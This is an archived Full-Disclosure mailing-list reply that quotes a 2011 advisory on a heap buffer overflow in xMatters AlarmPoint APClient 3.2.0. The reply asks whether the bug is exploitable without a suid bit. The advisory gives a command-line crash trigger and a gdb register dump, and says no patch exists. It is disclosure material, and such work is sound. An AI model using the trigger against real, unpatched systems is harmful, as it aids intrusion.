| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 28 Apr 2011 14:40:22 -0300
From: Mario Vilas <mvilas@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Insect Pro - Advisory 2011 0428 - Zero Day -
Heap Buffer Overflow in xMatters APClient
Is the suid bit set on that binary? Otherwise, unless I'm missing something
it doesn't seem to be exploitable by an attacker...
On Thu, Apr 28, 2011 at 12:03 PM, Juan Sacco
<jsacco@...ecurityresearch.com>wrote:
> Information
> --------------------
> Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
> Version: APClient 3.2.0 (native)
> Software : xMatters AlarmPoint
> Vendor Homepage : http://www.xmatters.com
> Vulnerability Type : Heap Buffer Overflow
> Md5: 283d98063323f35deb7afbd1db93d859 APClient.bin
> Severity : High
> Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com>
>
> Description
> ------------------
> The AlarmPoint Java Server consists of a collection of software
> components and software APIs designed to provide a flexible and
> powerful set of tools for integrating various applications to
> AlarmPoint.
>
> Details
> -------------------
> AlarmPoint APClient is affected by a Heap Overflow vulnerability in
> version APClient 3.2.0 (native)
>
> A heap overflow condition is a buffer overflow, where the buffer that
> can be overwritten is allocated in the heap portion of memory, generally
> meaning that the buffer was allocated using a routine such as the POSIX
> malloc() call.
> https://www.owasp.org/index.php/Heap_overflow
>
>
> Exploit as follow:
> Submit a malicious file cointaining the exploit
> root@...gateway:/opt/alarmpointsystems/integrationagent/bin$
> ./APClient.bin --submit-file maliciousfile.hex
> or
> (gdb) run `python -c 'print "\x90"*16287'`
> Starting program:
> /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c
> 'print "\x90"*16287'`
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x0804be8a in free ()
> (gdb) i r
> eax 0xa303924 170932516
> ecx 0xbfb8 49080
> edx 0xa303924 170932516
> ebx 0x8059438 134583352
> esp 0xbfff3620 0xbfff3620
> ebp 0xbfff3638 0xbfff3638
> esi 0x8059440 134583360
> edi 0x80653f0 134632432
> eip 0x804be8a 0x804be8a <free+126>
> eflags 0x210206 [ PF IF RF ID ]
> cs 0x73 115
> ss 0x7b 123
> ds 0x7b 123
> es 0x7b 123
> fs 0x0 0
> gs 0x33 51
> (gdb)
>
>
> Solution
> -------------------
> No patch are available at this time.
>
> Credits
> -------------------
> Manual discovered by Insecurity Research Labs
> Juan Sacco - http://www.insecurityresearch.com
>
> --
> --
> _________________________________________________
> Insecurity Research - Security auditing and testing software
> Web: http://www.insecurityresearch.com
> Insect Pro 2.5 was released stay tunned
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
“There's a reason we separate military and the police: one fights the enemy
of the state, the other serves and protects the people. When the military
becomes both, then the enemies of the state tend to become the people.”
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists